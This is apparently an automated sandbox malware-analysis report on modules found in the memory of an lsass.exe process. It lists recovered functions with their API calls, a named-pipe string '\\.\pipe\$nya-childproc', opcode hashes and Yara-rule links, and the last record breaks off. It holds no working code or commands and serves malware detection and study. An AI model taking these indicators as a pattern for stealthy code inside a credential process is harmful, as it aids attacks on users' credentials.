Source File: 00000009.00000002.2816668849.0000017D2DD51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true

Associated: 00000009.00000002.2815675528.0000017D2DD50000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2817784234.0000017D2DD65000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2818711397.0000017D2DD70000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2819499827.0000017D2DD72000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2820277659.0000017D2DD79000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_17d2dd50000_lsass.jbxd

Similarity

API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 849930591-393685449
Opcode ID: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
Instruction ID: a7143d3f81dc630082b136a90ca0f54496fd1e4b9adf58d3744d12870631f34a
Opcode Fuzzy Hash: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
Instruction Fuzzy Hash: 59D17C7260CF988AEB20DB65A4403DD77B0FB45788F182115EA8D57B9ADBB4E5C6C700

Function 0000017D2DD2962C Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310COMMON

Download Yara Rule

APIs

__FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 0000017D2DD29689

Part of subcall function 0000017D2DD2A544: __GetUnwindTryBlock.LIBCMT ref: 0000017D2DD2A587
Part of subcall function 0000017D2DD2A544: __SetUnwindTryBlock.LIBVCRUNTIME ref: 0000017D2DD2A5AC

Is_bad_exception_allowed.LIBVCRUNTIME ref: 0000017D2DD29761
__FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 0000017D2DD299AF
std::bad_alloc::bad_alloc.LIBCMT ref: 0000017D2DD29ABC

Strings

csm, xrefs: 0000017D2DD296A3
csm, xrefs: 0000017D2DD2970A
csm, xrefs: 0000017D2DD29784

Memory Dump Source

Source File: 00000009.00000003.1782464858.0000017D2DD20000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000017D2DD20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_3_17d2dd20000_lsass.jbxd

Similarity

API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 849930591-393685449
Opcode ID: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
Instruction ID: 310fc0b5922953b9c4234ef9c5d0874e37dd68400065c5e6711a8eed723815eb
Opcode Fuzzy Hash: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
Instruction Fuzzy Hash: 03D16832648B888AEB609F65A4883ED77B0FB45798F185215EE8D57B9FDB34C5C2C700

Function 0000017D2DD8A22C Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310COMMON

Download Yara Rule

APIs

__FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 0000017D2DD8A289

Part of subcall function 0000017D2DD8B144: __GetUnwindTryBlock.LIBCMT ref: 0000017D2DD8B187
Part of subcall function 0000017D2DD8B144: __SetUnwindTryBlock.LIBVCRUNTIME ref: 0000017D2DD8B1AC

Is_bad_exception_allowed.LIBVCRUNTIME ref: 0000017D2DD8A361
__FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 0000017D2DD8A5AF
std::bad_alloc::bad_alloc.LIBCMT ref: 0000017D2DD8A6BC

Strings

csm, xrefs: 0000017D2DD8A384
csm, xrefs: 0000017D2DD8A2A3
csm, xrefs: 0000017D2DD8A30A

Memory Dump Source

Source File: 00000009.00000002.2821913737.0000017D2DD81000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD80000, based on PE: true

Associated: 00000009.00000002.2821164430.0000017D2DD80000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2822805609.0000017D2DD95000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2823553309.0000017D2DDA0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2824246909.0000017D2DDA2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2824895475.0000017D2DDA9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_17d2dd80000_lsass.jbxd

Similarity

API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 849930591-393685449
Opcode ID: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
Instruction ID: 9e2277bdb93d732f8d65bec1f9792de935e17d97a6474368d5dd48676858bcf4
Opcode Fuzzy Hash: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
Instruction Fuzzy Hash: 06D1697260CF888AEB229B65A4453DD77B4FB45788F2C2115EA8D97B9ADB34C4C3C700

Function 0000017D2DD5104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 99memoryregistryCOMMON

Download Yara Rule

APIs

RegQueryInfoKeyW.ADVAPI32 ref: 0000017D2DD510B1
RegEnumValueW.ADVAPI32 ref: 0000017D2DD51117
GetProcessHeap.KERNEL32 ref: 0000017D2DD5115A
HeapAlloc.KERNEL32 ref: 0000017D2DD51168
GetProcessHeap.KERNEL32 ref: 0000017D2DD51185
HeapFree.KERNEL32 ref: 0000017D2DD51193

Strings

d, xrefs: 0000017D2DD510D6

Memory Dump Source

Source File: 00000009.00000002.2816668849.0000017D2DD51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true

Associated: 00000009.00000002.2815675528.0000017D2DD50000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2817784234.0000017D2DD65000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2818711397.0000017D2DD70000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2819499827.0000017D2DD72000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2820277659.0000017D2DD79000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_17d2dd50000_lsass.jbxd

Similarity

API ID: Heap$Process$AllocEnumFreeInfoQueryValue
String ID: d
API String ID: 3743429067-2564639436
Opcode ID: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
Instruction ID: 3cb689649fdd88a86a4149668db6177ce478f31cb262a3dabc8e4b9b4df4e1f0
Opcode Fuzzy Hash: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
Instruction Fuzzy Hash: 69412D72218F84DAE760CF61F44479A77B1F788B98F488129DB8907759DF78C58ACB80

Function 0000017D2DD8104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 99memoryregistryCOMMON

Download Yara Rule

APIs

RegQueryInfoKeyW.ADVAPI32 ref: 0000017D2DD810B1
RegEnumValueW.ADVAPI32 ref: 0000017D2DD81117
GetProcessHeap.KERNEL32 ref: 0000017D2DD8115A
HeapAlloc.KERNEL32 ref: 0000017D2DD81168
GetProcessHeap.KERNEL32 ref: 0000017D2DD81185
HeapFree.KERNEL32 ref: 0000017D2DD81193

Strings

d, xrefs: 0000017D2DD810D6

Memory Dump Source

Source File: 00000009.00000002.2821913737.0000017D2DD81000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD80000, based on PE: true

Associated: 00000009.00000002.2821164430.0000017D2DD80000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2822805609.0000017D2DD95000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2823553309.0000017D2DDA0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2824246909.0000017D2DDA2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2824895475.0000017D2DDA9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_17d2dd80000_lsass.jbxd

Similarity

API ID: Heap$Process$AllocEnumFreeInfoQueryValue
String ID: d
API String ID: 3743429067-2564639436
Opcode ID: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
Instruction ID: 98616a2ff3825150f651b4fb7690e968d14ee0c6a71bcc45fe7d64e6a84f1a9b
Opcode Fuzzy Hash: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
Instruction Fuzzy Hash: 59415F32218F84D6E761CF21E44479A77B1F788B99F588125DB8D47758DF39C48ACB40

Function 0000017D2DD52518 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 44filethreadCOMMON

Download Yara Rule

APIs

GetProcessIdOfThread.KERNEL32 ref: 0000017D2DD5252D
GetCurrentProcessId.KERNEL32 ref: 0000017D2DD52537
CreateFileW.KERNEL32 ref: 0000017D2DD52568
WriteFile.KERNEL32 ref: 0000017D2DD52590
ReadFile.KERNEL32 ref: 0000017D2DD525AF
CloseHandle.KERNEL32 ref: 0000017D2DD525B8

Strings

\\.\pipe\$nya-childproc, xrefs: 0000017D2DD52549

Memory Dump Source

Source File: 00000009.00000002.2816668849.0000017D2DD51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true

Associated: 00000009.00000002.2815675528.0000017D2DD50000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2817784234.0000017D2DD65000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2818711397.0000017D2DD70000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2819499827.0000017D2DD72000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2820277659.0000017D2DD79000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_17d2dd50000_lsass.jbxd

Similarity

API ID: File$Process$CloseCreateCurrentHandleReadThreadWrite
String ID: \\.\pipe\$nya-childproc
API String ID: 166002920-3933612297
Opcode ID: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
Instruction ID: 709f8d1fd23cfc63cb23fbc949a151c789b254d588f567ccc9f9cf4f3d996b29
Opcode Fuzzy Hash: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
Instruction Fuzzy Hash: 50114C3261CB4482F7108B21F41439A7770FB89BD4F984315EB5E02AA9CF7CC18ACB80

Function 0000017D2DD82518 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 44filethreadCOMMON

Download Yara Rule

APIs

GetProcessIdOfThread.KERNEL32 ref: 0000017D2DD8252D
GetCurrentProcessId.KERNEL32 ref: 0000017D2DD82537
CreateFileW.KERNEL32 ref: 0000017D2DD82568
WriteFile.KERNEL32 ref: 0000017D2DD82590
ReadFile.KERNEL32 ref: 0000017D2DD825AF
CloseHandle.KERNEL32 ref: 0000017D2DD825B8

Strings

\\.\pipe\$nya-childproc, xrefs: 0000017D2DD82549

Memory Dump Source

Source File: 00000009.00000002.2821913737.0000017D2DD81000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD80000, based on PE: true

Associated: 00000009.00000002.2821164430.0000017D2DD80000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2822805609.0000017D2DD95000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2823553309.0000017D2DDA0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2824246909.0000017D2DDA2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2824895475.0000017D2DDA9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_17d2dd80000_lsass.jbxd

Similarity

API ID: File$Process$CloseCreateCurrentHandleReadThreadWrite
String ID: \\.\pipe\$nya-childproc
API String ID: 166002920-3933612297
Opcode ID: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
Instruction ID: 8a422d2de5b097a681069f0c02d7800a7805f06357f7c2059ff15cb4b32cedfd
Opcode Fuzzy Hash: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
Instruction Fuzzy Hash: C9114C3661CB4482E7108F21F81439A7770FB89BD4F984325EA5D43AA9CF3DC196CB40

Function 0000017D2DD57C50 Relevance: 12.2, APIs: 8, Instructions: 227COMMON

Download Yara Rule

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 0000017D2DD57C78
__scrt_acquire_startup_lock.LIBCMT ref: 0000017D2DD57CCA
_RTC_Initialize.LIBCMT ref: 0000017D2DD57CF8
__scrt_dllmain_after_initialize_c.LIBCMT ref: 0000017D2DD57D1E
__scrt_release_startup_lock.LIBCMT ref: 0000017D2DD57D49

Memory Dump Source

Source File: 00000009.00000002.2816668849.0000017D2DD51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true

Associated: 00000009.00000002.2815675528.0000017D2DD50000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2817784234.0000017D2DD65000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2818711397.0000017D2DD70000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2819499827.0000017D2DD72000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2820277659.0000017D2DD79000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_17d2dd50000_lsass.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
String ID:
API String ID: 190073905-0
Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
Instruction ID: 4c8f37232e856023605888e2b1735ea5b4ca42d108cd0c214cd9eba3c911007f
Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
Instruction Fuzzy Hash: 4F81C23070CF4D96FA60EB65B8413E966B1AF85B84F6C4015AA0D47397DBB8C8CB8740

Function 0000017D2DD27050 Relevance: 12.2, APIs: 8, Instructions: 227COMMON

Download Yara Rule

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 0000017D2DD27078
__scrt_acquire_startup_lock.LIBCMT ref: 0000017D2DD270CA
_RTC_Initialize.LIBCMT ref: 0000017D2DD270F8
__scrt_dllmain_after_initialize_c.LIBCMT ref: 0000017D2DD2711E
__scrt_release_startup_lock.LIBCMT ref: 0000017D2DD27149

Memory Dump Source

Source File: 00000009.00000003.1782464858.0000017D2DD20000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000017D2DD20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_3_17d2dd20000_lsass.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
String ID:
API String ID: 190073905-0
Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
Instruction ID: e277e449b48480b4843398206f7a681ef9f1fae92a2cb6f22c3226b47e71a24d
Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
Instruction Fuzzy Hash: A381A03060DF4DA6FAB59B65B84A3D962B1AF86780F5C50159D0C4779FDA38C9CB8B00

Function 0000017D2DD87C50 Relevance: 12.2, APIs: 8, Instructions: 227COMMON

Download Yara Rule

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 0000017D2DD87C78
__scrt_acquire_startup_lock.LIBCMT ref: 0000017D2DD87CCA
_RTC_Initialize.LIBCMT ref: 0000017D2DD87CF8
__scrt_dllmain_after_initialize_c.LIBCMT ref: 0000017D2DD87D1E
__scrt_release_startup_lock.LIBCMT ref: 0000017D2DD87D49

Memory Dump Source

Source File: 00000009.00000002.2821913737.0000017D2DD81000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD80000, based on PE: true

Associated: 00000009.00000002.2821164430.0000017D2DD80000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2822805609.0000017D2DD95000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2823553309.0000017D2DDA0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2824246909.0000017D2DDA2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2824895475.0000017D2DDA9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_17d2dd80000_lsass.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
String ID:
API String ID: 190073905-0
Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
Instruction ID: b3475ebd1878b3df7e9254989a387c3d90c6b4d1e975dd1e66cf4fe51e50b77a
Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
Instruction Fuzzy Hash: B381B33160CF4DA6FA52AB66F4413E962B1AF85B84F7C8125994DC7397DB39C8C78300

Function 0000017D2DD59AAC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,?,?,0000017D2DD59C6B,?,?,?,0000017D2DD5945C,?,?,?,?,0000017D2DD58F65), ref: 0000017D2DD59B31
GetLastError.KERNEL32(?,?,?,0000017D2DD59C6B,?,?,?,0000017D2DD5945C,?,?,?,?,0000017D2DD58F65), ref: 0000017D2DD59B3F
LoadLibraryExW.KERNEL32(?,?,?,0000017D2DD59C6B,?,?,?,0000017D2DD5945C,?,?,?,?,0000017D2DD58F65), ref: 0000017D2DD59B69
FreeLibrary.KERNEL32(?,?,?,0000017D2DD59C6B,?,?,?,0000017D2DD5945C,?,?,?,?,0000017D2DD58F65), ref: 0000017D2DD59BD7
GetProcAddress.KERNEL32(?,?,?,0000017D2DD59C6B,?,?,?,0000017D2DD5945C,?,?,?,?,0000017D2DD58F65), ref: 0000017D2DD59BE3

Strings

api-ms-, xrefs: 0000017D2DD59B51

Memory Dump Source

Source File: 00000009.00000002.2816668849.0000017D2DD51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true

Associated: 00000009.00000002.2815675528.0000017D2DD50000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2817784234.0000017D2DD65000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2818711397.0000017D2DD70000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2819499827.0000017D2DD72000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2820277659.0000017D2DD79000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_17d2dd50000_lsass.jbxd

Similarity

API ID: Library$Load$AddressErrorFreeLastProc
String ID: api-ms-
API String ID: 2559590344-2084034818
Opcode ID: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
Instruction ID: f48c940c265e2daad92e5c1e5b6921450fbf53ad875bcdb193b5a88706f70175
Opcode Fuzzy Hash: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
Instruction Fuzzy Hash: 6A31AE3121AF4891FF119B16B8807E523B4BF58BA0F9D0625ED1D4B796EF78E4C68390

Function 0000017D2DD89AAC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,?,?,0000017D2DD89C6B,?,?,?,0000017D2DD8945C,?,?,?,?,0000017D2DD88F65), ref: 0000017D2DD89B31
GetLastError.KERNEL32(?,?,?,0000017D2DD89C6B,?,?,?,0000017D2DD8945C,?,?,?,?,0000017D2DD88F65), ref: 0000017D2DD89B3F
LoadLibraryExW.KERNEL32(?,?,?,0000017D2DD89C6B,?,?,?,0000017D2DD8945C,?,?,?,?,0000017D2DD88F65), ref: 0000017D2DD89B69
FreeLibrary.KERNEL32(?,?,?,0000017D2DD89C6B,?,?,?,0000017D2DD8945C,?,?,?,?,0000017D2DD88F65), ref: 0000017D2DD89BD7
GetProcAddress.KERNEL32(?,?,?,0000017D2DD89C6B,?,?,?,0000017D2DD8945C,?,?,?,?,0000017D2DD88F65), ref: 0000017D2DD89BE3

Strings

api-ms-, xrefs: 0000017D2DD89B51

Memory Dump Source

Source File: 00000009.00000002.2821913737.0000017D2DD81000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD80000, based on PE: true

Associated: 00000009.00000002.2821164430.0000017D2DD80000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2822805609.0000017D2DD95000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2823553309.0000017D2DDA0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2824246909.0000017D2DDA2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2824895475.0000017D2DDA9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_17d2dd80000_lsass.jbxd

Similarity

API ID: Library$Load$AddressErrorFreeLastProc
String ID: api-ms-
API String ID: 2559590344-2084034818
Opcode ID: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
Instruction ID: c12e4aa8ff06e60cbbbd7569c0cd2eabf1cef89453e49187164cfbaec92f7efc
Opcode Fuzzy Hash: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
Instruction Fuzzy Hash: 6731A03121AF4891EE129B16B8847E523B4BF44BA0F6D0625ED5D87796EF38E4878310

Function 0000017D2DD63400 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32 ref: 0000017D2DD63431
GetLastError.KERNEL32 ref: 0000017D2DD6343D
CloseHandle.KERNEL32 ref: 0000017D2DD63455
CreateFileW.KERNEL32 ref: 0000017D2DD63480
WriteConsoleW.KERNEL32 ref: 0000017D2DD6349F

Strings

CONOUT$, xrefs: 0000017D2DD63461

Memory Dump Source

Source File: 00000009.00000002.2816668849.0000017D2DD51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true

Associated: 00000009.00000002.2815675528.0000017D2DD50000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2817784234.0000017D2DD65000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2818711397.0000017D2DD70000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2819499827.0000017D2DD72000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2820277659.0000017D2DD79000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_17d2dd50000_lsass.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
String ID: CONOUT$
API String ID: 3230265001-3130406586
Opcode ID: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
Instruction ID: 57ad0a87101fc014a47693d5d53f1c791703df7ebf8c7a55728d0379093e6ab6
Opcode Fuzzy Hash: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
Instruction Fuzzy Hash: 1C116031718F4486E7608B56F854759B7B4FB88BE4F584224EA5E87B99CF3CC48687C0

Function 0000017D2DD93400 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32 ref: 0000017D2DD93431
GetLastError.KERNEL32 ref: 0000017D2DD9343D
CloseHandle.KERNEL32 ref: 0000017D2DD93455
CreateFileW.KERNEL32 ref: 0000017D2DD93480
WriteConsoleW.KERNEL32 ref: 0000017D2DD9349F

Strings

CONOUT$, xrefs: 0000017D2DD93461

Memory Dump Source

Source File: 00000009.00000002.2821913737.0000017D2DD81000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD80000, based on PE: true

Associated: 00000009.00000002.2821164430.0000017D2DD80000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2822805609.0000017D2DD95000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2823553309.0000017D2DDA0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2824246909.0000017D2DDA2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2824895475.0000017D2DDA9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_17d2dd80000_lsass.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
String ID: CONOUT$
API String ID: 3230265001-3130406586
Opcode ID: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
Instruction ID: e3a41b74b1cc44d5356060edc72fb13dd37b5ae57991b998daf2e50b96aaf39a
Opcode Fuzzy Hash: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
Instruction Fuzzy Hash: 4D11603131CF4486E7608F52F85479976B4FB88FE4F584224EA5E87BA9CF3AC4958740

Function 0000017D2DD56270 Relevance: 9.2, APIs: 6, Instructions: 240threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0000017D2DD562AB
GetThreadContext.KERNEL32 ref: 0000017D2DD56415

Part of subcall function 0000017D2DD560A0: GetCurrentThreadId.KERNEL32 ref: 0000017D2DD560A4

Memory Dump Source

Source File: 00000009.00000002.2816668849.0000017D2DD51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true

Associated: 00000009.00000002.2815675528.0000017D2DD50000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2817784234.0000017D2DD65000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2818711397.0000017D2DD70000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2819499827.0000017D2DD72000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2820277659.0000017D2DD79000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_17d2dd50000_lsass.jbxd

Similarity

API ID: Thread$Current$Context
String ID:
API String ID: 1666949209-0
Opcode ID: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
Instruction ID: 8cf41acd218546793b6ed0d90e458c47a19c5a17e27bbef3670ec55f879e2049
Opcode Fuzzy Hash: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
Instruction Fuzzy Hash: 3CD17B76209F8C85EA70DB1AF49439A77B0F788B88F540156EA8D477A6DF7CC592CB00

Function 0000017D2DD86270 Relevance: 9.2, APIs: 6, Instructions: 240threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0000017D2DD862AB
GetThreadContext.KERNEL32 ref: 0000017D2DD86415

Part of subcall function 0000017D2DD860A0: GetCurrentThreadId.KERNEL32 ref: 0000017D2DD860A4

Memory Dump Source

Source File: 00000009.00000002.2821913737.0000017D2DD81000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD80000, based on PE: true

Associated: 00000009.00000002.2821164430.0000017D2DD80000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2822805609.0000017D2DD95000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2823553309.0000017D2DDA0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2824246909.0000017D2DDA2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2824895475.0000017D2DDA9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_17d2dd80000_lsass.jbxd

Similarity

API ID: Thread$Current$Context
String ID:
API String ID: 1666949209-0
Opcode ID: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
Instruction ID: b68fbc395b4008b8c062077b1f610ecf02756ea873cf5c8293ec7925ce342538
Opcode Fuzzy Hash: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
